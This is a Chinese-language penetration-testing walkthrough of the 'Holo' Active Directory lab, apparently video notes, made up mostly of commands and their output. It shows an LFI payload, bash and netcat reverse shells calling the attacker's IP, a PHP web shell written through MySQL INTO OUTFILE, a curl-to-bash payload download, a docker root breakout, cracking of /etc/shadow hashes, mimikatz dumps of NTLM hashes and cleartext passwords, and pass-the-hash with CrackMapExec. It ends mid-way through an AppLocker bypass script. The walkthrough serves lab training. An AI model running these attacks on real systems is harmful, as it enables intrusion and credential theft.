holo
【【靶机】holo-AD域渗透&web_lab(1)-外网渗透-内网渗透】 https://www.bilibili.com/video/BV13G4y1j7xF/?share_source=copy_web&vd_source=21485fc93994c5f47b14e02ed42e0e49
┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 10.200.110.33 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-26 16:04 CST
Nmap scan report for 10.200.110.33 (10.200.110.33)
Host is up (0.19s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 41:38:8d:8a:ee:8a:4b:6c:f9:f0:a3:79:e8:96:3b:36 (RSA)
| 256 63:66:d6:68:60:67:9a:36:ae:d1:99:b7:8b:66:4e:6d (ECDSA)
|_ 256 87:00:d8:b1:c7:63:5e:9c:30:8c:3d:e1:d0:5a:79:63 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: WordPress 5.5.3
| http-robots.txt: 21 disallowed entries (15 shown)
| /var/www/wordpress/index.php
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
|_http-title: holo.live
109/tcp filtered pop2
465/tcp filtered smtps
720/tcp filtered unknown
911/tcp filtered xact-backup
999/tcp filtered garcon
1110/tcp filtered nfsd-status
1259/tcp filtered opennl-voice
1524/tcp filtered ingreslock
2222/tcp filtered EtherNetIP-1
5959/tcp filtered unknown
5960/tcp filtered unknown
6003/tcp filtered X11:3
6668/tcp filtered irc
6881/tcp filtered bittorrent-tracker
8093/tcp filtered unknown
14000/tcp filtered scotty-ft
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel──(zacarx㉿zacarx)-[~]
└─$ wpscan --url "http://10.200.110.33" --enumerate u
....
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-UA-Compatible: IE=edge
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.200.110.33/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.200.110.33/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.200.110.33/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.200.110.33/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Emoji Settings (Passive Detection)
| - http://10.200.110.33/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.200.110.33/, Match: 'WordPress 5.5.3'
[i] The main theme could not be detected.
+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] admin
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.200.110.33/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
┌──(zacarx㉿zacarx)-[~/SecLists/Discovery/DNS]
└─$ gobuster vhost -u holo.live -w ./subdomains-top1million-5000.txt -t 1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://holo.live
[+] Method: GET
[+] Threads: 1
[+] Wordlist: ./subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/26 16:31:44 Starting gobuster in VHOST enumeration mode
===============================================================
...
因为网络,大量报错432就不复制了
最后找到了,dev,admin子域名我们对这三个域名进行目录爆破
得到:
www.holo.live/robots.txt
dev.holo.live/about.php
dev.holo.live/img.php
dev.holo.live/index.php
User-agent: *
Disallow: /var/www/admin/db.php
Disallow: /var/www/admin/dashboard.php
Disallow: /var/www/admin/supersecretdir/creds.txt后来,我发现dev.holo.live出现本地文件包含漏洞
让我们试试我们使用的有效载荷---http://dev.holo.live/img.php?file=../../../etc/passwd
得到
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false我们可以搜到利用这个漏洞拿到admin凭证
know you forget things, so I'm leaving this note for you:
admin:DBManagerLogin!
- gurag <3我们在管理网页源码查看页发现了?cmd= 执行漏洞
于是cmd建立反弹shell
推荐bash -c 'bash -i >& /dev/tcp/10.50.107.175/8888 0>&1
然后找到db_config文件
<?php
define('DB_SRV', '192.168.100.1');
define('DB_PASSWD', "!123SecureAdminDashboard321!");
define('DB_USER', 'admin');
define('DB_NAME', 'DashboardDB');
$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);
if($connection == false){
die("Error: Connection to Database could not be made." . mysqli_connect_error());
}
?>find / -type f -name "*.dockerenv" -ls 2>/dev/null得知我们身处容器之中,需要逃逸
python3 -c 'import pty;pty.spawn("/bin/bash")'
我们连接mysql
mysql -u admin -p -h 192.168.100.1结果没回显
那么再次安利渗透猴
Reverse Shell Cheat Sheet | pentestmonkey
后来我发现
python3 -c 'import pty; pty.spawn("/bin/bash")'
可
但是
python -c 'import pty; pty.spawn("/bin/bash")'
不可
算是长教训了,泪目。
最后在数据库发现:
mysql> select * from users;
select * from users;
+----------+-----------------+
| username | password |
+----------+-----------------+
| admin | DBManagerLogin! |
| gurag | AAAA |
+----------+-----------------+
2 rows in set (0.00 sec)然后我们利用数据库进行权限突破
CREATE TABLE hax(Code varchar(255));
INSERT INTO hax (Code) value ('<?php $cmd=$_GET[\"cmd\"]\;system($cmd)\;?>');>>>mysql> SELECT * FROM hax;
SELECT * FROM hax;
+-----------------------------------------+
| Code |
+-----------------------------------------+
| <?php $cmd=$_GET["cmd"];system($cmd);?> |
+-----------------------------------------+
1 row in set (0.00 sec)我们查看secure_file_priv变量
mysql> SHOW VARIABLES LIKE "secure_file_priv";
mysql> SHOW VARIABLES LIKE "secure_file_priv";
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+----------------+
| Variable_name | Value |
+------------------+----------------+
| secure_file_priv | /var/www/html/ |
+------------------+----------------+
1 row in set (0.00 sec)因此,我们进行写入操作
SELECT * FROM hax INTO OUTFILE '/var/www/html/hax.php';www-data@14c75992b944:/tmp/babbadeckl$ for i in {1..10000};do 2>/dev/null > /dev/tcp/192.168.100.1/$i && echo Port $i open;done
Port 22 open
Port 80 open
Port 3306 open
Port 8080 open检查有效性
curl 192.168.100.1:8080/hax.php?cmd=idcurl http://192.168.100.1:8080/hax.php?cmd=nc+-e+/bin/sh+10.50.107.175+9999
这个方法貌似不管用了
我们换种方法。find / -perm -u=s -type f 2>/dev/null
我们在卡里建立1.sh
写入1.sh
#!/bin/bash
bash -i >& /dev/tcp/10.50.107.175/999 0>&1然后建立http服务
然后使用msf监听
msfconsole
use multi/handler
set LHOST tun0
set LPORT 53
run然后我们在shell输入
curl 192.168.100.1:8080/hax.php?cmd=curl%20http%3A%2F%2F10.50.107.175%3A80%2F1.sh%7Cbash%20%26c^z退出
search post/multi/manage/shell_to_meterpreter
use 0
set session 1curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh >> linpeas.sh
chmod +x linpeas.sh
upload linpeas.sh
shell
chmod 777 linpeas.sh
./linpeas.sh >> linpeas.txtfind / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/docker
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chshdocker有点可疑,于是我们搜下能不能利用
搜到了!
于是我们输入
/usr/bin/docker run -v /:/mnt --rm -it alpine chroot /mnt sh
报错
Unable to find image 'alpine:latest' locally
我们输入docker ps -a
得到image,替换下
python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/docker run -v /:/mnt --rm -it cb1b741122e8 chroot /mnt sh
不过我们依旧在容器上
于是我们输入
docker image ls
找到unbuntu版本
/usr/bin/docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh我们cat /etc/shadow文件
得到
# cat /etc/shadow
cat /etc/shadow
root:$6$TvYo6Q8EXPuYD8w0$Yc.Ufe3ffMwRJLNroJuMvf5/Telga69RdVEvgWBC.FN5rs9vO0NeoKex4jIaxCyWNPTDtYfxWn.EM4OLxjndR1:18605:0:99999:7:::
daemon:*:18512:0:99999:7:::
bin:*:18512:0:99999:7:::
sys:*:18512:0:99999:7:::
sync:*:18512:0:99999:7:::
games:*:18512:0:99999:7:::
man:*:18512:0:99999:7:::
lp:*:18512:0:99999:7:::
mail:*:18512:0:99999:7:::
news:*:18512:0:99999:7:::
uucp:*:18512:0:99999:7:::
proxy:*:18512:0:99999:7:::
www-data:*:18512:0:99999:7:::
backup:*:18512:0:99999:7:::
list:*:18512:0:99999:7:::
irc:*:18512:0:99999:7:::
gnats:*:18512:0:99999:7:::
nobody:*:18512:0:99999:7:::
systemd-network:*:18512:0:99999:7:::
systemd-resolve:*:18512:0:99999:7:::
systemd-timesync:*:18512:0:99999:7:::
messagebus:*:18512:0:99999:7:::
syslog:*:18512:0:99999:7:::
_apt:*:18512:0:99999:7:::
tss:*:18512:0:99999:7:::
uuidd:*:18512:0:99999:7:::
tcpdump:*:18512:0:99999:7:::
sshd:*:18512:0:99999:7:::
landscape:*:18512:0:99999:7:::
pollinate:*:18512:0:99999:7:::
ec2-instance-connect:!:18512:0:99999:7:::
systemd-coredump:!!:18566::::::
ubuntu:!$6$6/mlN/Q.1gopcuhc$7ymOCjV3RETFUl6GaNbau9MdEGS6NgeXLM.CDcuS5gNj2oIQLpRLzxFuAwG0dGcLk1NX70EVzUUKyUQOezaf0.:18601:0:99999:7:::
lxd:!:18566::::::
mysql:!:18566:0:99999:7:::
dnsmasq:*:18566:0:99999:7:::
linux-admin:$6$Zs4KmlUsMiwVLy2y$V8S5G3q7tpBMZip8Iv/H6i5ctHVFf6.fS.HXBw9Kyv96Qbc2ZHzHlYHkaHm8A5toyMA3J53JU.dc6ZCjRxhjV1:18570:0:99999:7:::然后我们用hashcat爆破
hashcat -a 0 -m 1800 p.txt /usr/share/wordlists/rockyou.txt得到密码linuxrulez
sshuttle -r linux-admin@10.200.111.33 10.200.111.0/24ssh-keygen -t rsa
获取密钥
把自己的密钥加到/root/.ssh/authorized_keys
貌似nmap不行
于是
我们ssh登录到10.200.110.33
root@ip-10-200-110-33:~# nmap -sP 10.200.110.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-28 06:25 UTC
Nmap scan report for ip-10-200-110-1.eu-west-1.compute.internal (10.200.110.1)
Host is up (0.00012s latency).
MAC Address: 02:27:12:F2:56:27 (Unknown)
Nmap scan report for ip-10-200-110-30.eu-west-1.compute.internal (10.200.110.30)
Host is up (0.0011s latency).
MAC Address: 02:7B:52:BC:1E:D3 (Unknown)
Nmap scan report for ip-10-200-110-31.eu-west-1.compute.internal (10.200.110.31)
Host is up (0.00041s latency).
MAC Address: 02:2D:A4:13:01:2F (Unknown)
Nmap scan report for ip-10-200-110-32.eu-west-1.compute.internal (10.200.110.32)
Host is up (0.00032s latency).
MAC Address: 02:3E:0F:BB:96:B3 (Unknown)
Nmap scan report for ip-10-200-110-35.eu-west-1.compute.internal (10.200.110.35)
Host is up (0.0011s latency).
MAC Address: 02:90:CD:DE:93:AD (Unknown)
Nmap scan report for ip-10-200-110-250.eu-west-1.compute.internal (10.200.110.250)
Host is up (0.00059s latency).
MAC Address: 02:FC:B2:BC:42:65 (Unknown)
Nmap scan report for ip-10-200-110-33.eu-west-1.compute.internal (10.200.110.33)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 1.70 seconds哦我们发现
10.200.110.31
有一个登录页面
页面有重置密码,我们很轻易的就通过逻辑漏洞将其突破
后来我们看到了,文件上传漏洞
之前讲过的知识了
我们直接屏蔽js
轻松上传
注意第一次我执行失败
因为我用的是linux的php反弹shell文件
然后我们就拿到了shell
下载minikatz
Download mimikatz from SourceForge.net
然后上传
powershell.exe Invoke-WebRequest http://10.50.107.175/mimikatz.exe -outfile mimikatz.exe
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit
得到
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
668 {0;000003e7} 1 D 21351 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 2076472 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 2100336 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 306323 (00000000:0004ac93)
Session : Interactive from 1
User Name : watamet
Domain : HOLOLIVE
Logon Server : DC-SRV01
Logon Time : 12/28/2022 5:34:26 AM
SID : S-1-5-21-471847105-3603022926-1728018720-1132
msv :
[00000003] Primary
* Username : watamet
!!!!!
* Domain : HOLOLIVE
* NTLM : d8d41e6cf762a8c77776a1843d4141c9
!!!!
* SHA1 : 7701207008976fdd6c6be9991574e2480853312d
* DPAPI : 300d9ad961f6f680c6904ac6d0f17fd0
tspkg :
wdigest :
* Username : watamet
* Domain : HOLOLIVE
* Password : (null)
kerberos :
!!!
* Username : watamet
* Domain : HOLO.LIVE
* Password : Nothingtoworry!
!!!!
ssp :
credman :
Authentication Id : 0 ; 45785 (00000000:0000b2d9)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : S-SRV01$
* Domain : holo.live
* Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef
ssp :
credman :
Authentication Id : 0 ; 45707 (00000000:0000b28b)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : S-SRV01$
* Domain : holo.live
* Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : S-SRV01$
Domain : HOLOLIVE
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : s-srv01$
* Domain : HOLO.LIVE
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 27323 (00000000:00006abb)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : S-SRV01$
* Domain : holo.live
* Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef
ssp :
credman :
Authentication Id : 0 ; 27283 (00000000:00006a93)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : S-SRV01$
* Domain : holo.live
* Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef
ssp :
credman :
Authentication Id : 0 ; 26060 (00000000:000065cc)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 12/28/2022 5:34:04 AM
SID :
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 306298 (00000000:0004ac7a)
Session : Interactive from 1
User Name : watamet
Domain : HOLOLIVE
Logon Server : DC-SRV01
Logon Time : 12/28/2022 5:34:26 AM
SID : S-1-5-21-471847105-3603022926-1728018720-1132
msv :
[00000003] Primary
* Username : watamet
* Domain : HOLOLIVE
* NTLM : d8d41e6cf762a8c77776a1843d4141c9
* SHA1 : 7701207008976fdd6c6be9991574e2480853312d
* DPAPI : 300d9ad961f6f680c6904ac6d0f17fd0
tspkg :
wdigest :
* Username : watamet
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : watamet
* Domain : HOLO.LIVE
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/28/2022 5:34:10 AM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/28/2022 5:34:06 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : S-SRV01$
Domain : HOLOLIVE
Logon Server : (null)
Logon Time : 12/28/2022 5:34:04 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : s-srv01$
* Domain : HOLO.LIVE
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!然后我们使用
CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具
Passing-the-Hash
CME支持使用带-H标志的Passing-The-Hash攻击通过SMB进行身份验证
crackmapexec smb <target(s)> -u username -H NTHASH
这可以让我们搜索到内部网络中的现有 SMB 服务器
crackmapexec smb 10.200.110.0/24 -u watamet -d HOLOLIVE -H d8d41e6cf762a8c77776a1843d4141c9
得到
┌──(zacarx㉿zacarx)-[~]
└─$ crackmapexec smb 10.200.110.0/24 -u watamet -d HOLOLIVE -H d8d41e6cf762a8c77776a1843d4141c9
SMB 10.200.110.30 445 DC-SRV01 [*] Windows 10.0 Build 17763 x64 (name:DC-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.35 445 PC-FILESRV01 [*] Windows 10.0 Build 17763 x64 (name:PC-FILESRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.31 445 S-SRV01 [*] Windows 10.0 Build 17763 x64 (name:S-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB 10.200.110.30 445 DC-SRV01 [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9
SMB 10.200.110.35 445 PC-FILESRV01 [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9
SMB 10.200.110.31 445 S-SRV01 [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9 (Pwn3d!)我们连接一下
smbclient //10.200.110.35/Users -U HOLOLIVE/watamet
拿到user.txt
shuru
xfreerdp /u:watamet /p:'Nothingtoworry!' /v:10.200.110.35
进入桌面拿powershell
我们用辅助工具https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt
r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0) (github.com)
下载到kali,再上传
powershell.exe Invoke-WebRequest http://10.50.107.175/SeatbeltNet3.5x64.exe -outfile sb.exe
./sb.exe -group=system
我们发现其被锁定无法运行,那么,我们试试AppLocker绕过
运行secpol.msc
可以没用
我们找到了个绕过项目
我们输入
#A hacky script to convert YML to MD file the way I want
#Author: Oddvar Moe
#If you can use it, be my guest!
function Convert-YamlToMD
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
$YamlObject,
[Parameter(Mandatory=$true)]
[String]
$Outfile
)
Begin
{
}
Process
{
# Header
"`#`# $($YamlObject.Name)" | Add-Content $Outfile
"``````" | Add-Content $Outfile
foreach($cmd in $YamlObject.Commands)
{
"`n$($cmd.command)" | Add-Content $Outfile
"$($cmd.description)" | Add-Content $Outfile
}
"``````" | Add-Content $Outfile
"* Windows binary: $($YamlObject.'Windows Binary') " | Add-Content $Outfile
"* Bypasses Default AppLocker Rules: $($YamlObject.'Bypasses Default AppLocker Rules') " | Add-Content $Outfile
"* Mitre: `[$($YamlObject.MITRE.ID)`]`($($YamlObject.MITRE.Link)`) " | Add-Content $Outfile
" " | Add-Content $Outfile
"* Links: " | Add-Content $Outfile
foreach($link in $YamlObject.Resources)
{
" * $($link.link)" | Add-Content $Outfile
}
